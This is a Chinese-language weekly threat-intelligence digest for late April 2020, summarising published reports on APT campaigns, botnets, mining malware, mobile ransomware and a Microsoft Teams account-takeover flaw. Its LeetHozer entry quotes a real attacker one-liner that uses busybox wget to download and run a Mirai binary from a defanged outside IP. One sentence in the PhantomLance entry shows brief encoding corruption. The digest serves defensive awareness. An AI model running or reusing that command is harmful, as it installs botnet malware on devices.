2020.04.23-2020.04.30

　　攻擊團伙情報

　　Lazarus APT組織使用西方某航空巨頭招聘等信息針對特定國家的定向攻擊事件分析

　　Donot APT團伙近期針對周邊國家和地區(qū)的攻擊活動分析

　　PhantomLance：利用應用商店傳播的海蓮花Android攻擊樣本分析

　　Gorgon Group組織利用“訂單，付款收據(jù)”等誘餌投遞攻擊郵件

　　Nazar：據(jù)影子經(jīng)紀人泄露文件發(fā)現(xiàn)的新APT組織

　　Hermit(隱士)APT組織2020年最新攻擊活動分析

　　攻擊行動或事件情報

　　Outlaw:針對歐洲的新型加密僵尸網(wǎng)絡

　　窺探裸聊詐騙背后黑色產(chǎn)業(yè)鏈的一角

　　惡意代碼情報

　　精準投放Tsunami僵尸網(wǎng)絡和“魔鏟”挖礦木馬的行動分析

　　UU頁游助手升級通道傳播獨狼Rootkit病毒，已感染上萬臺電腦

　　Black Rose Lucy勒索軟件升級換代

　　LeetHozer Botnet分析報告

　　漏洞相關情報

　　Microsoft Teams中的帳戶接管漏洞，利用惡意的GIF可導致子域接管

　　其他相關

　　ESET：2020第一季度威脅報告

攻擊團伙情報

　　1、Lazarus APT組織使用西方某航空巨頭招聘等信息針對特定國家的定向攻擊事件分析

　　披露時間：2020年04月30日

　　情報來源：

　　https://mp.weixin.qq.com/s/y1j5K0y38cnSPzRLbVvuFw

　　相關信息：

　　LazarusAPT組織是疑似具有東北亞背景的APT團伙，該組織攻擊活動最早可追溯到2007年，其早期主要針對韓國、美國等政府機構，以竊取敏感情報為目的。自2014年后，該組織開始針對全球金融機構、虛擬貨幣交易所等為目標，進行以斂財為目的的攻擊活動。

　　據(jù)公開情報顯示，2014 年索尼影業(yè)遭黑客攻擊事件，2016 年孟加拉國銀行數(shù)據(jù)泄露事件，2017年美國國防承包商、美國能源部門及英國、韓國等比特幣交易所被攻擊等時間都出自Lazarus之手。

　　近日，紅雨滴團隊和奇安信APT實驗室又監(jiān)測到該組織利用敏感國家外交關系，西方某航空航天巨頭招聘等信息開展新一輪攻擊活動。此次活動中，該組織采用模板注入的方式從遠程服務器獲取帶有惡意宏的文檔執(zhí)行，從而繞過殺軟檢測，值得注意的是第一次上傳VirusTotal時僅有一家殺軟成功檢出。

　　2、Donot APT團伙近期針對周邊國家和地區(qū)的攻擊活動分析

　　披露時間：2020年04月28日

　　情報來源：

　　https://mp.weixin.qq.com/s/e47ui2Gl0jqQSz6F12bxHA

　　相關信息：

　　Donot“肚腦蟲”(APT-C-35)是疑似具有南亞背景的APT組織，其主要以周邊國家的政府機構為目標進行網(wǎng)絡攻擊活動，通常以竊密敏感信息為目的。該組織具備針對Windows與Android雙平臺的攻擊能力。

　　近期，奇安信紅雨滴和奇安信APT實驗室在日常的跟蹤過程中，再次監(jiān)測到該組織開展了新一輪攻擊活動。此次攻擊活動中，該組織采用的技戰(zhàn)術手法并未發(fā)生大的變化，只是在代碼中做了些輕微改動：例如下載器中將字符串簡單加密處理、Android樣本中將C2等信息簡單加密處理等。

　　3、PhantomLance：利用應用商店傳播的海蓮花Android攻擊樣本分析

　　披露時間：2020年04月29日

　　情報來源：

　　https://securelist.com/apt-phantomlance/96772/

　　相關信息：

　　Dr.WEB在2019年披露了一個存在于Google Play商店中的后門木馬，該木馬較之常規(guī)惡意軟件更為復雜?？ò退够谠搱蟾孀匪莸揭粋€自2015年至今長期活躍的攻擊活動，并將其命名為“PhantomLance”。

　　該攻擊活動主要通過包括Google Play在內(nèi)的Android應用商店進行傳播，通過偽裝成瀏覽器清理工具等誘導受害者下載安裝。根據(jù)卡巴斯基研究表明，該惡意木馬至今已迭代3個版本，主要以竊取受害者設備上的敏感信息為目的。攻擊活動與海蓮花存在重疊，惡意樣本與海蓮花 Android樣本在代碼結構上存在較大的相似度，同時也與海蓮花 MacOs后門存在相同的命名方式。

　　根據(jù)卡巴斯基數(shù)據(jù)顯示，自2016年起，印度、越南、孟加拉國‘、印度尼西亞等南亞國家大約有300臺Android設備被攻擊。

　　4、Gorgon Group組織利用“訂單，付款收據(jù)”等誘餌投遞攻擊郵件

　　披露時間：2020年04月27日

　　情報來源：

　　https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw

　　相關信息：

　　近期騰訊安全威脅情報中心檢測到多個企業(yè)受到以PPT文檔為誘餌文檔的釣魚郵件攻擊。這些釣魚郵件投遞的PPT文檔包均含惡意宏代碼，宏代碼會啟動mshta執(zhí)行保存在pastebin上的遠程腳本代碼，且pastebin URL是由Bitly生成的短鏈接。

　　此次攻擊的主要特點為惡意代碼保存在托管平臺pastebin上：包括VBS腳本、Base64編碼的Powershell腳本以及經(jīng)過混淆的二進制數(shù)據(jù)。攻擊者在后續(xù)階段會通過計劃任務下載RAT木馬，然后將其注入指定進程執(zhí)行，RAT會不定期更換，當前獲取的RAT 木馬是Azorult竊密木馬。

　　對比分析發(fā)現(xiàn)，攻擊者注冊的pastebin賬號為”lunlayloo”( 創(chuàng)建于2019年10月)，與另一個賬號“hagga”(創(chuàng)建于2018年12月)對應攻擊事件中使用的TTP高度相似，因此騰訊威脅情報中旬認為兩者屬于同一家族ManaBotnet，并且”lunlayloo”可能為“hagga”的后繼者。

　　有安全廠商分析認為Pastebin賬號“hagga”發(fā)起的攻擊活動有可能來自組織Gorgon Group，一個疑似來自巴基斯坦或與巴基斯坦有關聯(lián)的黑客組織。該組織已進行了一系列非法行動和針對性攻擊，包括針對英國、西班牙、俄羅斯和美國的政府組織的攻擊。

　　5、Nazar：據(jù)影子經(jīng)紀人泄露文件發(fā)現(xiàn)的新APT組織

　　披露時間：2020年04月22日

　　情報來源：

　　https://www.epicturla.com/blog/the-lost-nazar

　　相關信息：

　　2017年，”影子經(jīng)紀人”披露了一系列黑客工具，其中令威脅分析人員感興趣的是SIGS.py,該文件是NSA用于檢索其余APT組織的掃描程序，至今仍有15個組織未被安全廠商確認。

　　近期，在OPCDE網(wǎng)絡安全峰會上，安全研究人員披露了其關于SIG37的研究，該安全研究人員稱SIG37對應的組織疑似來自伊朗，對應的惡意軟件中有“khzer”一詞，據(jù)稱該詞在波斯語中意為監(jiān)督，監(jiān)視。因此，研究人員將該組織命名為Nazar.

　　6、Hermit(隱士)APT組織2020年最新攻擊活動分析

　　披露時間：2020年04月24日

　　情報來源：

　　https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw

　　相關信息：

　　兩年前，騰訊安全威脅情報中心曝光了SYSCON/SANNY木馬的活動情況，并且根據(jù)關聯(lián)分析確定跟KONNI為同一組織所為。該組織的攻擊對象包括與朝鮮半島相關的非政府組織、政府部門、貿(mào)易公司、新聞媒體等。

　　SYSCON/SANNY木馬是一個非常有特色的遠程控制木馬，通過ftp協(xié)議來進行C&C控制，該后門的主要攻擊目標為朝鮮半島相關的重要政治人物或者要害部門，偶爾也會針對東南亞等國進行攻擊。該活動自2017年下半年開始活躍，并且對多個目標進行了攻擊活動。被曝光后，該組織活動沒有任何減弱的跡象。騰訊安全威脅情報中心根據(jù)該組織的特點，在2018年12月將其命名為“Hermit(隱士)”。

　　2020年，“Hermit(隱士)”APT組織依然保持較高的活躍度，攻擊方式和木馬行為上也有了較大的更新，因此騰訊威脅情報中旬對近期的攻擊活動做一個整理，并對木馬的一些更新情況做一個詳細分析匯總。

攻擊行動或事件情報

　　1、Outlaw:針對歐洲的新型加密僵尸網(wǎng)絡

　　披露時間：2020年04月28日

　　情報來源：

　　https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

　　相關信息：

　　Outlaw是2018年趨勢科技披露的僵尸網(wǎng)絡團伙，該團伙早期主要針對汽車和金融行業(yè)。通常使用暴力破解和SSH漏洞實現(xiàn)對目標系統(tǒng)的遠程訪問。

　　近期，Yoroi在日常的監(jiān)測活動中，攔截了嘗試攻擊其客戶的Linux惡意軟件，經(jīng)分析發(fā)現(xiàn)，該惡意軟件是著名的“Shellbot”變體，“Shellbot”是Outlaw團伙常用的惡意軟件。捕獲的變體與perl后門捆綁，其中包括SSH掃描器。該攻擊活動主要針對全球范圍內(nèi)具備IRC服務器和新Moneroc池的組織。

　　2、窺探裸聊詐騙背后黑色產(chǎn)業(yè)鏈的一角

　　披露時間：2020年04月28日

　　情報來源：

　　https://ti.qianxin.com/blog/articles/peeking-into-the-corner-of-the-black-industry-chain-behind-naked-chat-scams

　　相關信息：

　　近日，奇安信病毒響應中心在日常黑產(chǎn)挖掘過程中發(fā)現(xiàn)有人以裸聊的形式在社交網(wǎng)絡上傳播某種視頻直播軟件，該軟件在提供正常直播內(nèi)容的同時還會在暗地里收集用戶數(shù)據(jù)，而受害者往往控制不住自己的欲望，導致個人信息被泄露，嚴重的甚至被敲詐錢財。

　　該APK樣本經(jīng)過加固，輸入手機號和正確的推廣碼后才會執(zhí)行惡意代碼將相關信息上傳到服務器上。所以該樣本免殺效果非常好，很難被探測到，經(jīng)過后續(xù)擴展發(fā)現(xiàn)這是一套完整的裸聊詐騙框架，已經(jīng)被大量的黑產(chǎn)團伙使用。

　　近幾年，隨著多種新型網(wǎng)絡詐騙興起，前有博彩殺豬盤在東南亞搞的風生水起，后有網(wǎng)貸，校園貸在內(nèi)地危害人間，造成了當事人傾家蕩產(chǎn)、自殺等人間慘劇，嚴重影響了社會秩序。而本文讓我們來聊一聊裸聊與詐騙。

　　任何事物都會不斷的發(fā)展進化，以適應當下的環(huán)境，裸聊也不例外。早期裸聊的形式較為簡單，黑產(chǎn)團伙建立色情站點，會先通過“試聊”的方式消除用戶的顧慮，幾分鐘后彈出對話框提示“賬戶余額不足”需要充值才能繼續(xù)聊天，之后還會提供VIP會員服務，加入VIP后可以享受女主播一對一裸聊服務和上門服務。

　　到了2019年黑產(chǎn)們改進了裸聊的形式，并結合大火的“殺豬盤”模式，從原來只彈框的被動接觸，變成了現(xiàn)在的主動和被動相結合的形式，主動在社交網(wǎng)絡上與你發(fā)起會話進行聊天，使用相關《話術》誘導你進行裸聊，上鉤之后會發(fā)你app的下載二維碼以及對應的邀請碼。裸聊App會獲取你的通訊錄并錄制裸聊時的視頻，裸聊結束后會對你進行恐嚇和勒索。

惡意代碼情報

　　1、精準投放Tsunami僵尸網(wǎng)絡和“魔鏟”挖礦木馬的行動分析

　　披露時間：2020年04月24日

　　情報來源：

　　https://mp.weixin.qq.com/s/vAq_8LL0GlS-DLi5KNZJ9g

　　相關信息：

　　近日，安天CERT聯(lián)合哈爾濱工業(yè)大學網(wǎng)絡安全響應組通過網(wǎng)絡安全監(jiān)測發(fā)現(xiàn)了一起僵尸網(wǎng)絡和挖礦木馬事件，該事件針對Linux系統(tǒng)，包含服務器和智能設備。攻擊者配置了一個IP列表，如果目標主機外網(wǎng)IP在列表中則下載運行Tsunami僵尸程序，如果目標主機外網(wǎng)IP不在列表中則下載運行“魔鏟”挖礦木馬，IP列表共8487條，全球范圍內(nèi)涉及政府部門、金融行業(yè)、互聯(lián)網(wǎng)企業(yè)、媒體、運營商等多種目標，國內(nèi)也有大量目標。

　　安天CERT分析推測，IP列表中的對應機構的特點是網(wǎng)絡流量相對較大，因此被攻擊者用來做僵尸網(wǎng)絡的組成部分;IP列表外的，網(wǎng)絡流量可能相對較小，因此被攻擊者用來挖礦。

　　被感染的Linux系統(tǒng)的計劃任務中，存在一個每隔一段時間執(zhí)行一次下載和運行update.sh腳本的任務。該腳本功能是獲取計算機信息(用戶id、處理器架構和公網(wǎng)IP)，連接網(wǎng)絡讀取一個IP列表(server.txt)，判斷主機的公網(wǎng)IP是否存在于該IP列表中，如果存在則準備下載組成僵尸網(wǎng)絡的僵尸程序運行，如果不存在則準備下載挖礦木馬運行。

　　2、UU頁游助手升級通道傳播獨狼Rootkit病毒，已感染上萬臺電腦

　　披露時間：2020年04月28日

　　情報來源：

　　https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA

　　相關信息：

　　騰訊安全威脅情報中心檢測發(fā)現(xiàn)，UU頁游助手通過其軟件升級通道，傳播獨狼Rootkit病毒。獨狼Rootkit家族是一個長期依賴第三方Ghost鏡像傳播的惡性鎖主頁后門病毒。本次由于通過借助UU頁游助手推廣渠道流氓傳播，使得獨狼Rootkit病毒在短時間內(nèi)感染量激增，受害網(wǎng)民已過萬，分布在全國各地。中毒電腦會出現(xiàn)莫名其妙安裝不請自來的軟件、頻繁彈出廣告、瀏覽器主頁被鎖定等現(xiàn)象。

　　3、Black Rose Lucy勒索軟件升級換代

　　披露時間：2020年04月28日

　　情報來源：

　　https://research.checkpoint.com/2020/lucys-back-ransomware-goes-mobile/

　　相關信息：

　　Black Rose Lucy是Check Point2018年披露的惡意軟件，該惡意軟件早期是針對Android平臺的僵尸網(wǎng)絡，近期，Check Point監(jiān)測發(fā)現(xiàn)，該惡意軟件新增了勒索功能，執(zhí)行后，將對受害者設備文件進行加密，并聲稱是來自美國聯(lián)邦調(diào)查局的，指控受害者設備上擁有非法的色情內(nèi)容，并已經(jīng)相關犯罪數(shù)據(jù)上傳至FBI,需要受害者交付贖金以免受牢獄之災。

　　4、LeetHozer Botnet分析報告

　　披露時間：2020年04月28日

　　情報來源：

　　https://blog.netlab.360.com/the-leethozer-botnet/

　　相關信息：

　　近期，360 NetLab捕獲了一個可疑的樣本，部分殺毒引擎將其識別為Mirai，但是其網(wǎng)絡流量卻不符合Mirai的特征，這引起了注意，經(jīng)分析，這是一個復用了Mirai的Reporter，Loader機制，重新設計了加密方法以及C2通信協(xié)議的Bot程序。

　　這個Bot程序之所以能在眾多變種脫穎而出，一是因為它獨特的的加密方法，嚴謹?shù)耐ㄐ艆f(xié)議;二是因為在溯源過程中，360 NetLab發(fā)現(xiàn)它很有可能隸屬于Moobot團伙而且正在迭代開發(fā)中。因為傳播過程中使用H0z3r字串(/bin/busybox wgethttp://37[.49.226.171:80/bins/mirai.m68k -O - > H0z3r;)，360 NetLab將其命名為LeetHozer。目前觀測到感染目標主要是雄邁旗下的固件版本早于2017年5月的H.264設備和部分固件版本晚于2017年5月H.265設備。

　　1、Microsoft Teams中的帳戶接管漏洞，利用惡意的GIF可導致子域接管

　　披露時間：2020年4月27日

　　情報來源：

　　https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/

　　相關信息：

　　隨著越來越多的企業(yè)從遠程位置開展業(yè)務，攻擊者將精力集中在利用關鍵技術(例如Zoom和Microsoft Teams)上，這些技術是公司及其員工保持聯(lián)系的基礎.

　　Cyberark安全研究人員發(fā)現(xiàn)Microsoft Teams中的子域接管漏洞，攻擊者可使用惡意GIF來抓取用戶的數(shù)據(jù)，并最終接管組織中的所有Teams帳戶。此漏洞將影響使用Teams桌面或Web瀏覽器版本的用戶。

其他相關

　　1、ESET：2020第一季度威脅報告

　　披露時間：2020年04月29日

　　情報來源：

　　https://www.welivesecurity.com/2020/04/29/eset-threat-report-q12020/

　　相關信息：

　　2020年第一季度，COVID-19爆發(fā)，使大部分地區(qū)處于封鎖狀態(tài)，但ESET安全研究人員并沒有停止威脅研究工作。在第一季度，ESET分析了Stantinko中的混淆技術，詳細介紹了針對巴西的銀行木馬Guildma。并披露了Turla針對亞美尼亞的水坑攻擊等。

　　與上一季度相比，2020第一季度中挖礦和Android惡意軟件有所下降，其他類型威脅則持上升趨勢，特別使Web相關的攻擊次數(shù)漲幅最大，這或許與新冠病毒的爆發(fā)相關。（來源：奇安信威脅情報中心）